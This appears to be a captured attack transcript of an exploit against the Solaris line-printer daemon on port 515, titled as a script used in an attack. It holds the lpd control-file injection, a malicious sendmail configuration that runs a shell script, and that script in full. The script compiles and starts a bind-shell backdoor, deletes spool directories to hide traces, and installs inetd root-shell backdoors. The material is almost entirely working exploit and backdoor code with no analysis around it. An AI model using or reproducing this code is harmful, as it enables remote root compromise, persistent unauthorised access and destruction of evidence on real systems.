Script used to attack via port 515 on 2001.1.178                                
                                                                                   
   <-- all 1 line for until next comment -->                                       
   <2>////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////KARMAPOLICE          
   <--- end of single line. each line is its own line from now own -->             
   <2>107 cfA666owned                                                              
   Howned                                                                          
   P\"-C/var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/mail.cf\" nobody         
   fdfA666config                                                                   
   fdfA666script                                                                   
   <3>379 mail.cf                                                                  
   # Keep this simple, explicit, and redundant                                     
                                                                                   
   V8                                                                              
                                                                                   
   Ou0                                                                             
   Og0                                                                             
   OL0                                                                             
   Oeq                                                                             
   OQ/tmp                                                                          
                                                                                   
   FX|/bin/sh /var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/script             
                                                                                   
   S3                                                                              
   S0                                                                              
   R$+ $#local $@blah $:blah                                                       
   S1                                                                              
   S2                                                                              
   S4                                                                              
   S5                                                                              
                                                                                   
   Mlocal P=/bin/sh, F=S, S=0, R=0, A=sh /var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/script
   Mprog P=/bin/sh, F=S, S=0, R=0, A=sh /var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/script
                                                                                   
   <3>1567 script                                                                  
   #!/bin/sh                                                                       
                                                                                   
   PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/ucb:/usr/local/bin:/usr/local/sbin\
   :/usr/xpg4/bin ; export PATH                                                    
                                                                                   
   cd /tmp                                                                         
                                                                                   
   # A backdoor on a Solaris ephemeral port. We don't fork, so it dies when you're
   # done...                                                                       
                                                                                   
   #CC=gcc                                                                         
   CC=cc                                                                           
                                                                                   
   cat > shell.c << __EOF__                                                        
   #include                                                              
   #include                                                              
   #include                                                              
   #include                                                           
   #include                                                          
   #include                                                          
                                                                                   
   int                                                                             
   main(int argc, char **argv)                                                     
   {                                                                               
       int sd, cd;                                                                 
       unsigned short port;                                                        
       struct sockaddr_in saddr;                                                   
                                                                                   
       if(argc < 2) exit(EXIT_FAILURE);                                            
       port = (unsigned short) strtoul(argv[1], NULL, 0);                          
       memset(&saddr, 0, sizeof saddr);                                            
       saddr.sin_family = AF_INET;                                                 
       saddr.sin_port = htons(port);                                               
       saddr.sin_addr.s_addr = htonl(INADDR_ANY);                                  
       sd = socket(AF_INET, SOCK_STREAM, 0);                                       
       bind(sd, (struct sockaddr *) &saddr, sizeof saddr);                         
       listen(sd, 1);                                                              
       cd = accept(sd, NULL, NULL);                                                
       dup2(cd, STDIN_FILENO);                                                     
       dup2(cd, STDOUT_FILENO);                                                    
       dup2(cd, STDERR_FILENO);                                                    
       execl("/bin/sh", "sh", (char *) 0);                                         
       exit(0);                                                                    
   }                                                                               
   __EOF__                                                                         
                                                                                   
   $CC -o shell shell.c -lsocket                                                   
   ./shell 37777 &                                                                 
   rm -f shell.c shell                                                             
                                                                                   
   # Minor cleaning...                                                             
                                                                                   
   rm -rf /var/spool/lp/tmp/*                                                      
   rm -rf /var/spool/lp/requests/*                                                 
                                                                                   
   # Some inetd backdoors. Uncomment wisely...                                     
                                                                                   
   rm -f x                                                                         
   #echo "ingreslock stream tcp nowait root /bin/sh sh -i" >> x                    
   echo "courier stream tcp nowait root /bin/sh sh -i"    >> x                     
   #echo "ftp-data stream tcp nowait root /bin/sh sh -i"   >> x                    
   #echo "domain stream tcp nowait root /bin/sh sh -i"     >> x                    
   #echo "printer stream tcp nowait root /bin/sh sh -i"    >> x                    
   inetd -s x                                                                      
   rm -f x                                                                         
                                                                                   
   <2>!